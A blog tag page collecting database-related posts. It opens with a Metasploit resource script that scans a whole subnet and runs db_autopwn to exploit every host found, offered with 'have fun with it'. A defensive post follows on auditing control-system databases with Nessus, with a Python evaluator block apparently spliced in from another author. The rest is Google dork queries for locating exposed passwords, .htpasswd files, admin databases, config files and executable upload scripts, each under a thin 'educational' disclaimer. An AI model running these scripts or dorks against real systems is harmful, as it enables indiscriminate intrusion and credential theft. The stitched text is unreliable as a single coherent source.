All Entries Tagged With: "database"

A db_autopwn script run from msfconsole

Here’s a handy script I found on the web, written by HD Moore himself. It works like a charm!

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

Have fun with it.

Database Auditing for Control System Applications

Author: Jason Holcomb

Whether it’s for real-time, historical, or some other purpose, there are databases of all shapes and sizes in control systems. Two questions regarding these databases:

1.) How do we verify that they are in a secure state?

2.) Can we learn or measure anything about the application security from the data inside them?

Tenable added database audit capability to Nessus earlier this year and I recently had the opportunity to further explore the new feature. The Database Compliance Checks plugin is in the same family as the Windows and Unix compliance plugins. The difference is that instead of authenticating to the OS, it authenticates to the database. From there it can call built-in database functions and run SQL.

So to answer question 1, Tenable provides audit files based on the CIS Benchmarks for Oracle, SQL Server, and MySQL. I tested on Oracle and MySQL and found that – no surprise here – there are many settings that can be improved upon from the default install. The Oracle audit file checks around 50 different configuration items. They range from simple password policy to more database-centric security settings such as the default tablespace for user accounts and restricting critical table access to the DBA and SYS accounts. These benchmarks are a good starting point for checking database security.

For question 2, let’s look at a simple example of a control system application setting in a database that we can audit. Say we want to verify that an operator audit trail is enabled for our HMIs. We know there is a setting in the GUI that dictates audit logging and that the value is stored in a database. The setting allows for different levels of audit logging, but we just want to verify that it is not disabled.

The first step will be to identify the table and test an SQL query to pull back the information we want to evaluate. We find the value in the t_hmi_cfg table and use this query:

select cfgvalue from T_HMI_CFG where cfgname like 'audit-trail';

The query brings back the value '1'. By repeatedly changing the value in the GUI and re-running this query, we learn that the value is '0' when audit logging is disabled. We can then write a Nessus database audit check to verify that the value is set to something other than '0'. Here is the audit check:

<custom_item>
type : SQL_POLICY
description : "Verify that the audit trail is enabled for operators."
sql_request : "select cfgvalue from T_HMI_CFG where cfgname like 'audit-trail';"
sql_types : POLICY_VARCHAR
sql_expect : regex: "[^0]"
</custom_item>

This is a simplistic example but hopefully illustrates the power of being able to audit values in a database. For systems with the right architecture, this opens up a whole new world of configuration auditing, which gives the asset owner even more assurance and insight into the security of their SCADA or DCS applications. The Nessus report looks exactly like any other Bandolier/Policy Compliance report:

[Screenshot: db-audit-passed]
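To show how a check like this behaves on edge cases, here is an added example (my code, not the post's or Tenable's): it parses the custom_item above, runs its sql_request against a constructed in-memory SQLite stand-in for the HMI database, and applies the regex expectation. It assumes a T_HMI_CFG table with cfgname and cfgvalue columns and search-style regex semantics; the exact evaluation rules Nessus uses are not documented on this page.

```python
import re
import sqlite3
# The audit check from the post, reproduced verbatim so the parser has real input.
AUDIT_CHECK = '''
<custom_item>
type : SQL_POLICY
description : "Verify that the audit trail is enabled for operators."
sql_request : "select cfgvalue from T_HMI_CFG where cfgname like 'audit-trail';"
sql_types : POLICY_VARCHAR
sql_expect : regex: "[^0]"
</custom_item>
'''

def parse_custom_item(text):
    """Turn the 'key : value' lines of a <custom_item> into a dict."""
    item = {}
    for line in text.splitlines():
        if ":" not in line or line.lstrip().startswith("<"):
            continue
        key, _, value = line.partition(":")
        item[key.strip()] = value.strip()
    return item

def evaluate(item, conn):
    """Run sql_request and test every returned value against sql_expect.
    Assumed semantics: 'regex:' is a search, and an empty result set fails."""
    sql = item["sql_request"].strip('"').rstrip(";")
    values = [str(row[0]) for row in conn.execute(sql).fetchall()]
    expect = item["sql_expect"]
    if expect.startswith("regex:"):
        pattern = re.compile(expect[len("regex:"):].strip().strip('"'))
        passed = bool(values) and all(pattern.search(v) for v in values)
    else:  # plain literal comparison for checks that are not regex-based
        passed = bool(values) and all(v == expect.strip('"') for v in values)
    return passed, values

def make_hmi_db(audit_trail_value):
    """Constructed in-memory stand-in for the HMI config database; None omits the row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table T_HMI_CFG (cfgname text, cfgvalue text)")
    rows = [("log-level", "2")]
    if audit_trail_value is not None:
        rows.append(("audit-trail", audit_trail_value))
    conn.executemany("insert into T_HMI_CFG values (?, ?)", rows)
    return conn

def audit_result(audit_trail_value):
    """True when the post's check passes for the given stored cfgvalue."""
    return evaluate(parse_custom_item(AUDIT_CHECK), make_hmi_db(audit_trail_value))[0]
```

Note that "[^0]" accepts "10" but rejects "00", and the evaluator treats a missing audit-trail row as a failure rather than a pass, since an absent setting is not evidence that logging is on.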

Since database auditing wasn’t available when we started the project, you will not find it in the current Bandolier audit files. I suspect this will change as we develop audit files for new applications and update the files for the existing set. Database auditing won’t apply to every application but for those where it is applicable, the security auditing capability will be greatly enhanced.

"http://*:*@www" domainname or "http://*:*@www" bob:bob

Here they are linked for instant gratification, and using a domain no-one cares about:

"http://*:*@www" microsoft

"http://*:*@www" bob:bob

These are queries to get inline passwords from search engines (not just Google); you type in the query followed by the domain name without the .com or .net.

Normally you would type "http://*:*@www" domainname or "http://*:*@www" bob:bob into Google, but I’ve linked the query above for instant gratification. Remember, this is just one of many ways to use Google to search. I didn’t form these queries; I merely searched the web for ‘answers’ and used queries from Google’s advanced search operators page. You can add to, modify, or substitute at will – it’s a free country – but be careful!

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.

"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )

Here’s a method of searching for scripts that let you upload files, which you can then execute on the server.

"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )

Normally you would type "index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl ) into Google, but I’ve linked the query above for instant gratification. Remember, this is just one of many ways to use Google to search. I didn’t form these queries; I merely searched the web for ‘answers’ and used queries from Google’s advanced search operators page. You can add to, modify, or substitute at will – it’s a free country!

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.

intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c

Here’s another method of finding password information, more so from Apache-centric servers.

intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c

Normally you would type intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c into Google, but I’ve linked the query above for instant gratification. Remember, this is just one of many ways to use Google to search. I didn’t form these queries; I merely searched the web for ‘answers’ and used queries from Google’s advanced search operators page.

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.

allinurl: admin mdb

Not all of these pages are administrators’ Access databases containing usernames, passwords, and other sensitive information, but many are, and there’s other useful information too.

allinurl: admin mdb

Normally you would type allinurl: admin mdb into Google, but I’ve linked the query above for instant gratification. Remember, this is just one of many ways to use Google to search. I didn’t form these queries; I merely searched the web for ‘answers’ and used queries from Google’s advanced search operators page.

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.

filetype:config config intext:appSettings "User ID"

These files generally contain configuration information for a .NET web application, such as connection strings to databases, file directories, and more. On a properly set up IIS these files are normally not served to the public, normally being the operative word.

filetype:config config intext:appSettings "User ID"

Normally you would type filetype:config config intext:appSettings "User ID" into Google, but I’ve linked the query above for instant gratification. Remember, this is just one of many ways to use Google to search. I didn’t form these queries; I merely searched the web for ‘answers’ and used queries from Google’s advanced search operators page.

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.

intitle:"Index of" pwd.db

This one speaks for itself. As has been said in the various hacking places around the web, it’s all well and good putting in security, but if you don’t protect your security (think about it) then what is the point, right?

intitle:"Index of" pwd.db

By now you should be seeing how these search queries are formed. You don’t have to hunt the web for these – you can go to Google’s ‘advanced Google search operators’ page and start learning how to create your own.

As always, these posts are educational and should not be used for pwning or any such unethical ‘stuff’.